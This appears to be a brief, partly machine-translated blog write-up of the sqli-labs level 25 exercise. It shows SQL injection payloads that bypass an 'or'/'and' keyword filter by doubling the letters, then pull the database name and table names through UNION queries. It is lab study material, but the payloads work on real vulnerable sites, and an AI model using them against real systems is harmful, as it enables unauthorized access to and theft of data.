sqli--labs(25)

Filtered or and get the injection

0X01 testing phase

'Error' is not being given so 'close

We know that good then closed behind closed #

?id=1' order by 1 and '1'='1

Grammatically incorrect discovered filtered or and

So we continue to construct

?id=1' oorrder by 1 anandd '1'='1

0X01 explosion database name

?id=-1' union select 1,database(),3 anandd '1'='1

 

 0X02 blasting table

?id=-1' union select 1,table_name from information_schema.tables where table_schema='security',3 anandd '1'='1

formation 的or

?id=-1' union select 1,(select table_name from infoorrmation_schema.tables where table_schema='security' limit 0,1),3 anandd '1'='1

 

成功

但是 为什么这样会不成功

?id=-1' union select 1,table_name from infoorrmation_schema.tables where table_schema='security',3 anandd '1'='1

 

Guess you like

Origin www.cnblogs.com/-zhong/p/10935186.html